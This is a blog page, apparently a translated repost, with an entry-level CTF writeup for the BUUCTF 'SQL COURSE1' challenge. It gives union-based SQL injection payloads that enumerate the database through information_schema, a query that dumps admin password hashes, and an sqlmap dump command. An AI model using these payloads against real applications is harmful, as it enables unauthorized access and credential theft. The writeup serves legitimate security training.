当前位置:网站首页>[writeup]buu SQL course1[entry level]
[writeup]buu SQL course1[entry level]
2022-06-12 14:45:00 【_ Xiao SA】
Observation website , Seems to have found the injection point
http://70e2a79f-6017-4286-b07f-1729220b2c7d.node4.buuoj.cn:81/#/content/-1 union select 1,2
/-1 union select 1,(
select group_concat(schema_name) from information_schema.schemata
)
Get the database
ctftraining
Get table name
-1 union select 1,(
select group_concat(table_name) from information_schema.tables where table_schema="ctftraining"
)
FLAG_TABLE
Get column name
-1 union select 1,(
select group_concat(column_name) from information_schema.columns where table_schema="ctftraining" and table_name='FLAG_TABLE'
)
FLAG_COLUMN
When getting data, it is found that the data is empty , We can only find another way
See if you can log in
news Found under the database of admin Password :67fef29ef7beb75f567587f135fa26a0
get flag
payload:
-1 union select 1,(
select group_concat(password) from news.admin
)
Use sqlmap
burp The injection point can be found directly in the 
python sqlmap -u url -D ”news” --dump-a
边栏推荐
- 【LDA】EM变分推理 粗略版笔记【待完善
- 【Calendar】1. For globalization 2 But only date can be formatted by SDF 3 Month to -1 4 Week from Sunday is the first day
- ADB control installation simulator
- JUnit exception, a method that asserts that the exception information is not empty
- C secret script Chapter 3 (detailed explanation of string function) (Section 1)
- Configuring OSPF pseudo connection for Huawei devices
- 【LocalDate LocalTime LocalDateTime】1. Using immutability to achieve thread safety 2 Current date, current time, current date time 3 Since the time zone is not considered, you need to add 8 hours to th
- 华为设备配置OSPF伪连接
- selenium进阶
- [Writeup]BUU SQL COURSE1[入门级]
猜你喜欢
华为设备配置H虚拟专用网
【LDA】LDA主题模型笔记—主要是狄利克雷
webdriver入门
![[wechat applet] 2 Environmental preparation](/img/8d/7bb68ca7d10751a6e992a53c5eff4a.jpg)
[wechat applet] 2 Environmental preparation
【OCR】AspriseOCR C# 英文、數字識別(中文不行)
Location (I) error: command erred out with exit status
Perfect ending | detailed explanation of the implementation principle of go Distributed Link Tracking
指针相关概念
![[wechat applet] 4 Introduction to wechat developer tools](/img/9d/0d6c5cc675fb70dde98b25649bd8d8.jpg)
[wechat applet] 4 Introduction to wechat developer tools
New technology: efficient self-monitoring visual pre training, local occlusion no longer need to worry!
随机推荐
Unit test (I) unit test with JUnit
Ankai microelectronics rushes to the scientific innovation board: the annual revenue of 500million Xiaomi industry fund is the shareholder
PMP敏捷知识点
jenkins相关
亿纬锂能拟募资90亿:刘金成骆锦红夫妇合计认购60亿 布局光谷
C secret script Chapter 1: data storage (in-depth analysis)
【Optional】1. Map and ifpresent 2 Ofnullable and orelse
Soft test (VI) Chrome browser installation selenium IDE
C語言中主函數調用另外一個函數,匯編代碼理解
Unhandled exception stack overflow
[Writeup]BUU SQL COURSE1[入门级]
The igatewayloadbalancer interface implements routing. Otherwise, it follows Sid routing
Two methods of QT using threads
New technology: efficient self-monitoring visual pre training, local occlusion no longer need to worry!
Nesting of C language annotations
函数递归示例
QT multi thread drawing and real-time refreshing method
Tensorrt based in-depth learning model deployment practice tutorial!
[wechat applet] 6.1 applet configuration file
JD scanning code to obtain cookies